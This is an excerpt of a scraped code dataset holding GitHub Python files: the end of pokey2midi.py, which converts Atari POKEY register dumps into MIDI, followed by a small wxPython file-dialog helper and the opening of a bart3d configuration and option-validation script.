self.states[t]\n\t\t\tmusic[t] = []\n\t\t\tfor pn, pokey in enumerate(self.pokeys):\n\t\t\t\tpokey.write(data[pn]) # write data to POKEY\n\t\t\t\tfeatures = features | pokey.AUDCTLFeatures # add which AUDCTL features were used\n\t\t\t\tstate = pokey.state.copy() # copy POKEY states dict\n\t\t\t\t# Append music data\n\t\t\t\tmusic[t].append({\n\t\t\t\t\t'poly': state['poly'],\n\t\t\t\t\t'note': state['note'],\n\t\t\t\t\t'vol': state['vol']\n\t\t\t\t})\n\t\t\t\tfor ch in range(4):\n\t\t\t\t\t# add voice used\n\t\t\t\t\tvoices.add( self.converter.voice(pn, ch, state['poly'][ch]) )\n\t\t\t\t\t# if this channel is producing sound\n\t\t\t\t\tif not state['volctrl'][ch] and \\\n\t\t\t\t\t\tstate['note'][ch] is not None \\\n\t\t\t\t\t\tand state['vol'][ch] > 0:\n\t\t\t\t\t\t\t# and if this sound is earlier than the known earliest sound\n\t\t\t\t\t\t\tif t < earliest_sound:\n\t\t\t\t\t\t\t\tearliest_sound = t # update earliest known sound\n\t\t\tpc = int((n+1) / total * 100) # current percentage\n\t\t\tif (pc % 10) == 0 and pc != lpc: # print multiples of 10%\n\t\t\t\t# print( \"%d%% \" % pc, end=\"\" )\n\t\t\t\tlpc = pc\n\t\t\n\t\tprint(\"Done!\")\n\t\tvoices = sorted(voices) # update voices from set to ordered list\n\t\t# Save results to memory\n\t\tself.music = music\n\t\tself.voices = voices\n\t\tself.times = list(sorted(music.keys()))\n\t\tself.earliestSound = earliest_sound\n\t\t# Display AUDCTL features used\n\t\tprint( \"AUDCTL features used:\", \", \".join(list(features)) if len(features) else \"None\" )\n\t\t\n\n# Main POKEY2MIDI program class, which handles everything\nclass Converter(object):\n\t\n\tdef __init__(self):\n\t\t# Set default options\n\t\t\n\t\t# Always retrigger notes, regardless of changes\n\t\tself.AlwaysRetrigger = False\n\t\t# Merge decaying notes into a single MIDI note\n\t\tself.MergeDecays = True\n\t\t# Boost note velocity (increases 
loudness)\n\t\tself.BoostVelocity = 1.0\n\t\t# Time limit (do not convert past this point)\n\t\tself.TimeLimit = None\n\t\t# Split different polynomial counter settings for channels as separate instrument tracks\n\t\tself.SplitPolyAsTracks = True\n\t\t# Use short track names\n\t\tself.ShortTrackNames = False\n\t\t# Trim initial silence (first note plays immediately)\n\t\tself.TrimSilence = True\n\t\t# Force a specific tempo\n\t\tself.ForceTempo = None\n\t\t# Attempt to detect song tempo with a simple algorithm\n\t\t# Display the results afterwards\n\t\tself.DetectTempo = False\n\t\t# Force a specific timebase\n\t\tself.ForceTimebase = None\n\t\t# Don't use note velocities for note loudness. Use the channel volume instead.\n\t\t# TODO: Fix potential issue with multiple tracks on same channel\n\t\tself.UseChannelVolume = False\n\t\t# Assign MIDI instruments to MIDI channels to emulate the original POKEY sound\n\t\tself.UseInstruments = False\n\t\t# Custom instruments to use\n\t\tself.CustomInstruments = None\n\t\t# Ignore volume information\n\t\tself.PitchOnly = None\n\t\t# Mark short notes\n\t\tself.MarkShortNotes = False\n\t\tself.ShortNoteCutoff = 1e3\n\t\n\t# Get a string tag for a given voice\n\t# A voice exists for each instrument for each channel for each POKEY\n\t# If we are not splitting different polynomial counters as instruments, the channels are the\n\t# voices themselves\n\tdef voice(self, pn, ch, poly):\n\t\tif self.SplitPolyAsTracks:\n\t\t\treturn \"%d %s %s\" % (pn, ch+1, poly)\n\t\telse:\n\t\t\treturn \"%d %s\" % (pn, ch+1)\n\t\n\t# Main conversion function\n\tdef convert(self, file, output):\n\t\t\n\t\tif not os.path.isfile(file):\n\t\t\tprint(\"File \\\"%s\\\" doesn't exist\" % file)\n\t\t\treturn\n\t\t\n\t\tif os.path.splitext(os.path.basename(file))[1].lower() == \".sap\": # Wrong usage\n\t\t\tprint(\"Error: POKEY2MIDI does not convert SAP files directly to MIDI.\")\n\t\t\tprint(\" You must use ASAPSCAN and save the POKEY register dumps to a text file, then run POKEY2MIDI on the text file.\")\n\t\t\tprint(\" Download ASAP: http://asap.sourceforge.net/\")\n\t\t\texit()\n\t\t\n\t\tself.file = file\n\t\t\n\t\tsong = Song(self) # The song object which will handle things\n\t\t\n\t\tprint(\"=\"*20 + \"[ POKEY2MIDI v%s ]\"%VERSION + \"=\"*20)\n\t\tprint(\"Opening \\\"%s\\\"\" % self.file)\n\t\t\n\t\t\n\t\t# Detect MIME type\n\t\tmime = mimetypes.guess_type(self.file)\n\t\tif mime[0] != \"text/plain\" or (mime[1] is not None and mime[1] != \"bzip2\"):\n\t\t\tprint(\"ERROR\\nIncorrect input format.\")\n\t\t\texit()\n\t\tif mime[1] == \"bzip2\":\n\t\t\thandle = bz2.open(self.file, \"rt\")\n\t\telif mime[1] is None:\n\t\t\thandle = open(self.file, \"rt\")\n\t\t\n\t\twith handle as fin:\n\t\t\tprint(\"Reading POKEY data...\")\n\t\t\t\n\t\t\t# Detect NTSC or PAL, skip to the 61st line, where we can tell them apart\n\t\t\t# NTSC will have timestamp 1.00, PAL will have 1.20\n\t\t\tfor ln in range(61):\n\t\t\t\tl = fin.readline()\n\t\t\t\n\t\t\tif l.split(\":\")[0].strip() == \"1.00\":\n\t\t\t\tmode = NTSC\n\t\t\t\tdt = DT_NTSC # the correct time between frames for NTSC\n\t\t\telse:\n\t\t\t\tmode = PAL\n\t\t\t\tdt = DT_PAL # the correct time between frames for PAL\n\t\t\t\n\t\t\t# Reset reading pointer\n\t\t\tfin.seek(0)\n\t\t\t\n\t\t\tln = 0 # line number\n\t\t\tfor l in fin:\n\t\t\t\tl = re.sub(r\"[\\n\\r\\:]\", \"\", l.strip()) # get rid of EOL characters and colon\n\t\t\t\tl = re.sub(r\"\\s+\", \" \", l) # get rid of extra spaces\n\t\t\t\tif l == \"NO RESPONSE\": # Stop at end of 
POKEY data, if any (for finite songs)\n\t\t\t\t\tbreak\n\t\t\t\t\n\t\t\t\t# Extract timestamp from the rest\n\t\t\t\ttokens = l.split(\" \")\n\t\t\t\ttry:\n\t\t\t\t\tif len(tokens) != 10 and len(tokens) != 20:\n\t\t\t\t\t\traise ValueError(\"unexpected number of tokens\")\n\t\t\t\t\tdata = (\" \".join(tokens[1:])).split(\"|\")\n\t\t\t\texcept Exception:\n\t\t\t\t\tprint(\"ERROR\\nIncorrect input format.\")\n\t\t\t\t\texit()\n\t\t\t\t\n\t\t\t\tif ln == 0: # Setup metadata if we just parsed the first line\n\t\t\t\t\tnumPOKEY = len(data)\n\t\t\t\t\t# Assume zeroed out registers initially\n\t\t\t\t\tlast_data = [bytes.fromhex(\"00\"*9)] * numPOKEY\n\t\t\t\t\tprint(\n\t\t\t\t\t\t\"Mode: \" + (\"Mono\" if numPOKEY == 1 else \"Stereo\") + \", \" + \\\n\t\t\t\t\t\t(\"NTSC (%.2f Hz)\" % FPS_NTSC if mode == NTSC else \"PAL (%.2f Hz)\" % FPS_PAL)\n\t\t\t\t\t)\n\t\t\t\t\n\t\t\t\t# Compute timestamp by ourselves, for more precision\n\t\t\t\tt = ln*dt\n\t\t\t\t\n\t\t\t\t# Stop after a given time limit\n\t\t\t\tif self.TimeLimit is not None and t > self.TimeLimit:\n\t\t\t\t\tbreak\n\t\t\t\t\n\t\t\t\t# AUDF1 AUDC1 AUDF2 AUDC2 AUDF3 AUDC3 AUDF4 AUDC4 AUDCTL\n\t\t\t\tfor n in range(numPOKEY): # convert to raw data\n\t\t\t\t\tdata[n] = bytes.fromhex(data[n])\n\t\t\t\t\n\t\t\t\tln += 1 # increase line number\n\t\t\t\t\n\t\t\t\t# asapscan outputs one line per frame. In many cases, lines are identical\n\t\t\t\t# Since duplicate lines are meaningless (only changes in POKEY state are useful\n\t\t\t\t# for detecting musical content), we ignore duplicate lines.\n\t\t\t\t\n\t\t\t\t# If POKEY data hasn't changed, we don't need to do anything\n\t\t\t\tif data == last_data: \n\t\t\t\t\tcontinue\n\t\t\t\t\n\t\t\t\tlast_data = data # Update previous state\n\t\t\t\t\n\t\t\t\t# Write song data (the state changes)\n\t\t\t\tsong.addState( t, data )\n\t\t\n\t\t# Initialize POKEYs\n\t\tsong.initPOKEY(numPOKEY, mode)\n\t\t\n\t\t# Compile song data into notes\n\t\tsong.compile()\n\t\t\n\t\t# Initialize MIDI\n\t\tmidi = MIDI()\n\t\t\n\t\t# If we want to trim silences, we set the MIDI time offset to the earliest sound\n\t\tif self.TrimSilence:\n\t\t\tmidi.timeOffset = song.earliestSound\n\t\t\t\n\t\t# If we want to force a known tempo, we change the MIDI tempo and the scale factor\n\t\tif self.ForceTempo is not None:\n\t\t\tmidi.scaleFactor = self.ForceTempo / DEFAULT_TEMPO\n\t\t\tmidi.tempo = self.ForceTempo\n\t\t\n\t\t# If we want to force a timebase, we do it now\n\t\tif self.ForceTimebase is not None:\n\t\t\tmidi.timebase = self.ForceTimebase\n\t\t\n\t\t# Each voice is a track\n\t\tfor v in song.voices:\n\t\t\tmt = midi.newTrack()\n\t\t\tv = v.split(\" \")\n\t\t\t# If each poly is in a separate track or not, we specify it\n\t\t\tif self.SplitPolyAsTracks:\n\t\t\t\tfmt = \"%s: Ch %s Poly %s\" if self.ShortTrackNames else \"POKEY %s Channel %s Poly %s\"\n\t\t\t\tmidi.setTrackName( mt, fmt % (v[0], int(v[1])+1, v[2]) )\n\t\t\t\tmidi.setInstrumentName( mt, \"Poly %s\" % v[2] )\n\t\t\telse:\n\t\t\t\tfmt = \"%s: Ch %s\" if self.ShortTrackNames else \"POKEY %s Channel %s\"\n\t\t\t\tmidi.setTrackName( mt, fmt % (v[0], int(v[1])+1) )\n\t\t\t\n\t\t# Current active notes for each channel\n\t\tactive_note = [ [None]*4 for pn in range(song.numPOKEY) ]\n\t\t\n\t\t# If we're detecting tempo, initialize beat counter\n\t\tif self.DetectTempo:\n\t\t\tbeats = dict()\n\t\t\n\t\t# We begin assembling the MIDI data\n\t\tprint(\"Assembling MIDI file...\")\n\t\tfor nt, t in enumerate(song.times):\n\t\t\tfor pn in range(song.numPOKEY):\n\t\t\t\tstate = song.music[t][pn]\n\t\t\t\tfor ch in 
range(4):\n\t\t\t\t\t\n\t\t\t\t\tvoice = self.voice(pn, ch, state['poly'][ch])\n\t\t\t\t\t\n\t\t\t\t\tmidi_track = song.voices.index(voice) + 1 # +1 due to conductor track\n\t\t\t\t\tmidi_ch = pn*4 + ch\n\t\t\t\t\t\n\t\t\t\t\tif state['note'][ch] is None:\n\t\t\t\t\t\tmidi_note = None\n\t\t\t\t\telse:\n\t\t\t\t\t\t# 21 is A0, which we're using at note 0 internally (as in the piano)\n\t\t\t\t\t\tmidi_note = state['note'][ch] + 21\n\t\t\t\t\t\n\t\t\t\t\t# In MIDI jargon, \"note velocity\" = loudness\n\t\t\t\t\t\n\t\t\t\t\t# 4-bit volume given in the melody\n\t\t\t\t\tvol = state['vol'][ch]\n\t\t\t\t\t\n\t\t\t\t\t# Volume used in MIDI (note velocity), with boost and 0-127 range\n\t\t\t\t\tmidi_vol = max(0,min(127,int(vol / 15 * 127 * self.BoostVelocity)))\n\t\t\t\t\t\n\t\t\t\t\t# If we are using channel volumes for the volume data, as opposed to note\n\t\t\t\t\t# velocity, then we always play the loudest note, but control the effect with\n\t\t\t\t\t# the channel volume\n\t\t\t\t\tif self.UseChannelVolume: \n\t\t\t\t\t\tch_vol = midi_vol\n\t\t\t\t\t\tmidi_vol = 127\n\t\t\t\t\t\n\t\t\t\t\t# If we are only considering pitch changes, we discard volume information altogether\n\t\t\t\t\tif self.PitchOnly:\n\t\t\t\t\t\tch_vol = 127 if vol > 0 else 0\n\t\t\t\t\t\tmidi_vol = 127 if vol > 0 else 0\n\t\t\t\t\t\n\t\t\t\t\t# If there's a note being played in the current channel of the current POKEY\n\t\t\t\t\tif active_note[pn][ch] is not None:\n\t\t\t\t\t\tkill = False\n\t\t\t\t\t\t\n\t\t\t\t\t\tif self.AlwaysRetrigger:\n\t\t\t\t\t\t\t# If AlwaysRetrigger is set, the previous note is always killed\n\t\t\t\t\t\t\tkill = True\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t# Otherwise, we use different heuristics to merge notes\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t# For volume changes\n\t\t\t\t\t\t\tif self.UseChannelVolume:\n\t\t\t\t\t\t\t\t# If we're using the channel volume, we update it if changed, \n\t\t\t\t\t\t\t\t# instead of sending a new note. No need to kill.\n\t\t\t\t\t\t\t\t# But ONLY if it's the same note!\n\t\t\t\t\t\t\t\tif active_note[pn][ch]['note'] == midi_note and \\\n\t\t\t\t\t\t\t\t\tactive_note[pn][ch]['vol'] != vol and \\\n\t\t\t\t\t\t\t\t\tvol > 0:\n\t\t\t\t\t\t\t\t\t\tmidi.ctrlChange(midi_track, t, midi_ch, 0x07, ch_vol)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t# Otherwise, we kill if the note is rising. 
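(the check below treats an\n\t\t\t\t\t\t\t\t# equal or higher volume as rising). 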
This usually means\n\t\t\t\t\t\t\t\t# a re-trigger of the note in the actual music.\n\t\t\t\t\t\t\t\t# Decaying sounds are usually used for decaying envelopes, so\n\t\t\t\t\t\t\t\t# the natural decay of the MIDI note should work fine.\n\t\t\t\t\t\t\t\t# Of course, only if we have set MergeDecays to True\n\t\t\t\t\t\t\t\tif self.MergeDecays and active_note[pn][ch]['vol'] <= vol:\n\t\t\t\t\t\t\t\t\tkill = True\n\t\t\t\t\t\t\t\t# Note, however, that if a song uses a ramping up attack, this\n\t\t\t\t\t\t\t\t# just results in many quick notes rising up in volume, which\n\t\t\t\t\t\t\t\t# is usually fine.\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t# For note changes\n\t\t\t\t\t\t\t# If new note is different, always cancel old note and retrigger\n\t\t\t\t\t\t\tif active_note[pn][ch]['note'] != midi_note:\n\t\t\t\t\t\t\t\tkill = True\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t# Kill if timbre changed while keeping the note fixed\n\t\t\t\t\t\t\t# This is usually used for percussive effects\n\t\t\t\t\t\t\t# Disabled for now\n\t\t\t\t\t\t\t# TODO: verify when this happens to know exactly how to handle it\n\t\t\t\t\t\t\t# if active_note[pn][ch]['voice'] != voice:\n\t\t\t\t\t\t\t\t# print(\"Voice changed\", pn, ch)\n\t\t\t\t\t\t\t\t# exit()\n\t\t\t\t\t\t\t\t# kill = True\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t# Always kill if current volume is zero\n\t\t\t\t\t\t\tif vol == 0:\n\t\t\t\t\t\t\t\tkill = True\n\t\t\t\t\t\t\n\t\t\t\t\t\t# Send the NoteOff for the current note if marked to kill it\n\t\t\t\t\t\tif kill:\n\t\t\t\t\t\t\tmidi.noteOff(\n\t\t\t\t\t\t\t\tactive_note[pn][ch]['track'],\n\t\t\t\t\t\t\t\tt,\n\t\t\t\t\t\t\t\tmidi_ch,\n\t\t\t\t\t\t\t\tactive_note[pn][ch]['note']\n\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\tactive_note[pn][ch] = None # Mark as free to be used\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t# Otherwise, update the note state\n\t\t\t\t\t\t\tactive_note[pn][ch] = {\n\t\t\t\t\t\t\t\t'note': midi_note,\n\t\t\t\t\t\t\t\t'vol': vol,\n\t\t\t\t\t\t\t\t'track': midi_track,\n\t\t\t\t\t\t\t\t'voice': voice\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\n\t\t\t\t\t# If no active note, a new current note exists and volume is non-zero, we have\n\t\t\t\t\t# a new note being played\n\t\t\t\t\tif active_note[pn][ch] is None and midi_note is not None and vol > 0:\n\t\t\t\t\t\t# If we are using the channel volume, we update it here before the note\n\t\t\t\t\t\tif self.UseChannelVolume:\n\t\t\t\t\t\t\tmidi.ctrlChange(midi_track, t, midi_ch, 0x07, ch_vol)\n\t\t\t\t\t\tif self.UseInstruments:\n\t\t\t\t\t\t\tif self.CustomInstruments:\n\t\t\t\t\t\t\t\tinst = self.CustomInstruments[state['poly'][ch]]\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tinst = POLY_INSTRUMENT[state['poly'][ch]]\n\t\t\t\t\t\t\tmidi.progChange(\n\t\t\t\t\t\t\t\tmidi_track, t, midi_ch,\n\t\t\t\t\t\t\t\tinst\n\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\n\t\t\t\t\t\t# If we are detecting tempo, we add the note-on times to per-voice beat\n\t\t\t\t\t\t# tracker, as long as the note is below a threshold (lower notes are\n\t\t\t\t\t\t# more likely to be related to beats), and if it's a tonal note\n\t\t\t\t\t\tif self.DetectTempo and \\\n\t\t\t\t\t\t\tstate['poly'][ch] in [5,6,7] and \\\n\t\t\t\t\t\t\tmidi_note < BPM_NOTE_THRESHOLD:\n\t\t\t\t\t\t\tif voice not in beats:\n\t\t\t\t\t\t\t\tbeats[voice] = list()\n\t\t\t\t\t\t\tbeats[voice].append(round(t / dt)) # append frame to beat\n\t\t\t\t\t\t\n\t\t\t\t\t\t# Add Note On event\n\t\t\t\t\t\tmidi.noteOn(midi_track, t, midi_ch, midi_note, midi_vol) \n\t\t\t\t\t\tactive_note[pn][ch] = {\n\t\t\t\t\t\t\t'note': midi_note,\n\t\t\t\t\t\t\t'vol': vol,\n\t\t\t\t\t\t\t'track': 
midi_track,\n\t\t\t\t\t\t\t'voice': voice\n\t\t\t\t\t\t} # Update active note\n\t\t\n\t\t# Once the track is done\n\t\t# Kill all leftover notes after a small offset\n\t\toffset = dt # in seconds\n\t\tfor pn in range(song.numPOKEY):\n\t\t\tfor ch in range(4):\n\t\t\t\tif active_note[pn][ch] is None:\n\t\t\t\t\tcontinue\n\t\t\t\t# Recompute the MIDI channel for this POKEY/channel pair; the loop\n\t\t\t\t# variables left over from the assembly loop above would be stale here\n\t\t\t\tmidi_ch = pn*4 + ch\n\t\t\t\tmidi.noteOff(\n\t\t\t\t\tactive_note[pn][ch]['track'],\n\t\t\t\t\tt + offset,\n\t\t\t\t\tmidi_ch,\n\t\t\t\t\tactive_note[pn][ch]['note']\n\t\t\t\t)\n\t\t\n\t\tif self.MarkShortNotes:\n\t\t\tmidi.filterNotesByLength(1.0 / self.ShortNoteCutoff)\n\t\t\n\t\tprint(\"Saving MIDI file at \\\"%s\\\"\" % output)\n\t\tmidi.save(output)\n\t\t\n\t\tif self.DetectTempo:\n\t\t\tself.detectTempo(beats, mode)\n\t\n\t# Tempo/bpm detection function\n\t# This is a VERY rudimentary algorithm, but it should work well enough for well-behaved songs\n\tdef detectTempo(self, beats, mode):\n\t\tif mode == NTSC:\n\t\t\tdt = DT_NTSC\n\t\t\tfps = FPS_NTSC\n\t\telse:\n\t\t\tdt = DT_PAL\n\t\t\tfps = FPS_PAL\n\t\t\n\t\t# For each voice\n\t\tguesses = set()\n\t\tfor v in beats:\n\t\t\tb = []\n\t\t\tfor i in range(1, len(beats[v])):\n\t\t\t\tb.append( beats[v][i] - beats[v][i-1] ) # add to a list of time differences\n\t\t\t\n\t\t\tif len(b) > BPM_COUNT_THRESHOLD:\n\t\t\t\tb = sorted(b)\n\t\t\t\tguesses.add(b[ len(b) // 2 ]) # add median difference as a possible fpb\n\t\t\n\t\t# If there ARE guesses, let's work on them\n\t\tif len(guesses) > 0:\n\t\t\tsuggestions = set() # list of reasonable suggestions\n\t\t\tfracs = [1,1/2,1/4,1/8,2,4,8,3/4,1/3,2/3,3,6,5/4,4/3] # list of reasonable fractions\n\t\t\t# We'll find all reasonable fractions of the potentially reasonable bpms found earlier\n\t\t\tfor guess in guesses:\n\t\t\t\tfor f in fracs:\n\t\t\t\t\tfpb = guess*f # suggested guess\n\t\t\t\t\tif FPB_LIMITS[0] <= fpb <= FPB_LIMITS[1]: # is it \"reasonable\"? \n\t\t\t\t\t\tsuggestions.add(round(fpb))\n\t\t\t\n\t\t\t# If there are reasonable suggestions\n\t\t\tif len(suggestions) > 0:\n\t\t\t\t# We display them\n\t\t\t\tprint(\"Possible tempos (in bpm):\")\n\t\t\t\tfor c, s in enumerate(reversed(sorted(suggestions))):\n\t\t\t\t\tbpm = 60 / (dt * s) # frames per beat to beats per minute - ToDo: shouldn't this be 60/50 for NTSC/PAL?\n\t\t\t\t\tprint(\" %16.12f\" % bpm, end=\"\")\n\t\t\t\t\tif c % 4 == 3 or c == len(suggestions)-1:\n\t\t\t\t\t\tprint(\"\")\n\t\t\t\tprint(\"Note: using high precision tempos with --bpm avoids notes drifting out of alignment.\")\n\t\t\t\treturn\n\t\t\n\t\tprint(\"Couldn't guess any tempo. Sorry!\")\n\n\n# If running by itself, handle command line options\nif __name__ == \"__main__\":\n\tparser = argparse.ArgumentParser(description=\"POKEY2MIDI v%s by LucasVB/1ucasvb (http://1ucasvb.com). Converts textual POKEY dumps from asapscan into MIDI files.\" % VERSION)\n\tparser.add_argument('--all', action='store_true', help=\"Use all notes by always retriggering. Useful for when notes are being missed. 
Overrides note merging.\")\n\tparser.add_argument('--notrim', action='store_false', help=\"Do not trim initial silence, which happens by default.\")\n\tparser.add_argument('--nosplit', action='store_false', help=\"Do not split different polynomial counter settings for channels as separate instrument tracks, which happens by default.\")\n\tparser.add_argument('--nomerge', action='store_false', help=\"Do not merge volume decays into a single MIDI note, which happens by default. Ignored if --all is used.\")\n\tparser.add_argument('--usevol', action='store_true', help=\"Use MIDI channel volume instead of note velocity. This is similar to how it happens in the actual chip.\")\n\tparser.add_argument('--pitchonly', action='store_true', help=\"Completely ignores note volume information, and considers only pitch changes when triggering notes. This is similar to --usevol, but the MIDI file will contain no channel volume MIDI messages.\")\n\tparser.add_argument('--useinst', action='store_true', help=\"Assign predefined MIDI instruments to emulate the original POKEY sound. Also use --setinst if you wish to define different instruments yourself.\")\n\tparser.add_argument('--shortnotes', metavar=\"k\", nargs=1, type=int, help=\"Assigns notes shorter than 1/k-th of a beat to separate channels. Useful for cleaning up certain songs, but may map certain notes to MIDI percussion (channel 10). Note: for now, this feature implies --nosplit.\")\n\tparser.add_argument('--shortnames', action='store_true', help=\"Use shorter MIDI track names.\")\n\tparser.add_argument('--setinst', metavar='n,n,n,n,n,n,n,n', nargs=1, type=str, help=\"Specify which General MIDI instruments to assign to each of the 8 poly settings. No spaces, n from 0 to 127. The last three are the most important for melody and default to: square wave=80, brass+lead=87, square wave=80.\")\n\tparser.add_argument('--boost', metavar='factor', nargs=1, type=float, help=\"Multiply note velocities by a factor. Useful if MIDI is too quiet. Use a large number (> 16) to make all notes have the same max loudness (useful for killing off POKEY effects that don't translate well to MIDI).\")\n\tparser.add_argument('--maxtime', metavar='time', nargs=1, type=float, help=\"By default, asapscan dumps 15 minutes (!) of POKEY data. Use this to ignore stuff after some point. Value is given in seconds, fractional values are allowed.\")\n\tparser.add_argument('--bpm', nargs=1, type=float, help=\"Assume a given tempo in beats per minute (bpm), as precisely as you want. Default is %d. If the song's bpm is known precisely, this option makes the MIDI notes align with the beats, which makes using the MIDI in other places much easier. Doesn't work if the song has a dynamic tempo.\" % DEFAULT_TEMPO)\n\tparser.add_argument('--findbpm', action='store_true', help=\"Attempts to post-process the data to automatically detect tempo/bpm by using a simple algorithm. The best guesses are merely displayed after the conversion. Run again with one of these guesses as a parameter with --bpm to see if events aligned properly. Cannot be used with --all, but might work better with --usevol.\")\n\tparser.add_argument('--timebase', nargs=1, type=int, help=\"Force a given MIDI timebase, the number of ticks in a beat (quarter note). 
Default is %d.\" % DEFAULT_TIMEBASE)\n\tparser.add_argument('--debug', action='store_true', help=argparse.SUPPRESS)\n\tparser.add_argument('input', metavar='input_file', type=str, nargs=1, help=\"Input POKEY dump text file.\")\n\tparser.add_argument('output', metavar='output_file', type=str, nargs=\"?\", help=\"MIDI output file. If not specified, will output to the same path, with a '.mid' extension\")\n\targs = parser.parse_args()\n\t\n\tconverter = Converter()\n\t\n\tif args.debug:\n\t\tDEBUG_POLYS = True\n\t\n\tconverter.AlwaysRetrigger = args.all\n\tconverter.MergeDecays = args.nomerge\n\tconverter.TrimSilence = args.notrim\n\tconverter.ShortTrackNames = args.shortnames\n\tconverter.SplitPolyAsTracks = args.nosplit\n\tconverter.UseChannelVolume = args.usevol\n\tconverter.PitchOnly = args.pitchonly\n\tconverter.UseInstruments = args.useinst\n\tconverter.DetectTempo = args.findbpm\n\tif args.boost is not None:\n\t\tconverter.BoostVelocity = args.boost[0]\n\tif args.maxtime is not None:\n\t\tconverter.TimeLimit = args.maxtime[0]\n\tif args.bpm is not None:\n\t\tconverter.ForceTempo = args.bpm[0]\n\tif args.timebase is not None:\n\t\tconverter.ForceTimebase = args.timebase[0]\n\tif args.useinst and args.setinst is not None:\n\t\tinsts = [min(127,max(0,int(i) if len(i) else 0)) for i in args.setinst[0].split(',')]\n\t\tinsts += [0]*(8-len(insts))\n\t\tconverter.CustomInstruments = insts\n\tif args.shortnotes is not None:\n\t\tconverter.MarkShortNotes = True\n\t\tconverter.SplitPolyAsTracks = False\n\t\tconverter.ShortNoteCutoff = args.shortnotes[0]\n\t\n\tinput = args.input[0]\n\t\n\tif args.output is not None:\n\t\toutput = args.output\n\telse:\n\t\toutput = os.path.splitext(os.path.realpath(input))[0] + \".mid\"\n\t\n\tif converter.DetectTempo and converter.AlwaysRetrigger:\n\t\tprint(\"Warning: --findbpm detection is incompatible with --all. 
No tempo will be detected.\")\n\t\tconverter.DetectTempo = False\n\t\n\tconverter.convert(input, output)\n\n# EOF\n","repo_name":"1ucasvb/pokey2midi","sub_path":"pokey2midi.py","file_name":"pokey2midi.py","file_ext":"py","file_size_in_byte":43038,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"41321531832","text":"import os\nimport wx\n\n_last_path = os.getcwd()\n\ndef save_project_as(parent):\n    global _last_path\n    dialog = wx.FileDialog(parent, \n        message=\"Save Project As ...\", \n        defaultDir=_last_path, \n        defaultFile=\"\", \n        wildcard=\"Psi project (*.psi)|*.psi\", \n        style=wx.SAVE|wx.OVERWRITE_PROMPT|wx.CHANGE_DIR\n    )\n    status = dialog.ShowModal()\n    path = dialog.GetPath()\n    dialog.Destroy()\n\n    if path:\n        _last_path = os.path.dirname(path)\n        # Only normalize the extension when the user actually picked a path\n        if not path.endswith('.psi'):\n            path += '.psi'\n\n    return status, path\n\ndef open_project(parent):\n    global _last_path\n    dialog = wx.FileDialog(parent,\n        message=\"Open Project...\",\n        defaultDir=_last_path, \n        defaultFile=\"\",\n        wildcard=\"Psi project (*.psi)|*.psi\",\n        style=wx.OPEN|wx.CHANGE_DIR\n    )\n    status = dialog.ShowModal()\n    path = dialog.GetPath()\n    dialog.Destroy()\n\n    _last_path = path or _last_path\n    return status, path\n\n\ndef confirm(parent, caption, message):\n    dialog = wx.MessageDialog(parent, \n        message=message, \n        caption=caption, \n        style=wx.YES_NO|wx.ICON_INFORMATION\n    )\n    status = dialog.ShowModal()\n    dialog.Destroy()\n    return status\n\ndef multichoice(parent, caption, message, choices):\n    dialog = wx.MultiChoiceDialog(parent, message, caption, choices)\n    status = dialog.ShowModal()\n    selections = dialog.GetSelections()\n    dialog.Destroy()\n    return status, selections\n","repo_name":"renatopp/psi-robotics","sub_path":"psi/gui/dialogs.py","file_name":"dialogs.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73899767127","text":"import configparser\nimport os,sys,re\n\nscript_dir = os.path.dirname(os.path.realpath(__file__))\n# script_dir = os.path.dirname(script_dir)\n\ndef conf_validate():\n    '''\n    Read user provided path from 'bart3d.conf' config file\n    '''\n    config = configparser.ConfigParser()\n    config_path = os.path.join(script_dir, 'bart3d.conf')\n    if not os.path.exists(config_path):\n        sys.stderr.write(\"CRITICAL: bart3d.conf does not exist in {}!\\n\".format(script_dir))\n        sys.exit(1)\n    config.read(config_path)\n    return config\n\ndef opt_validate(options):\n    '''\n    Validate input options and specify used data.\n    '''\n    config = conf_validate()\n    \n    if not options.outdir:\n        options.outdir = os.path.join(os.getcwd(), 'bart3d_output') # create output directory at current working directory\n    \n    if not options.outFileName:\n        # derive the output name from the treatment/control matrix, hic or cool file names\n        first_treatment_file=options.treatment.split(',')[0]\n        first_control_file=options.control.split(',')[0]\n        treat_base = re.split(r'\\.matrix|\\.hic|\\.cool',os.path.basename(first_treatment_file))[0]\n        control_base = re.split(r'\\.matrix|\\.hic|\\.cool',os.path.basename(first_control_file))[0]\n        outfile_base = '{}_OVER_{}'.format(treat_base,control_base)\n        options.outFileName = outfile_base\n\n    \n    # === hg38 ===\n    if options.species == 'hg38': \n        data_dir = os.path.join(config['path']['hg38_library_dir'], 'hg38_library')\n\n    # === mm10 ===\n    elif options.species == 'mm10': \n        data_dir = os.path.join(config['path']['mm10_library_dir'], 'mm10_library')\n    \n    
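# Resolve the species-specific library and utility file paths (the file\n    # names follow the bart2 naming convention of the library bundle)\n    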
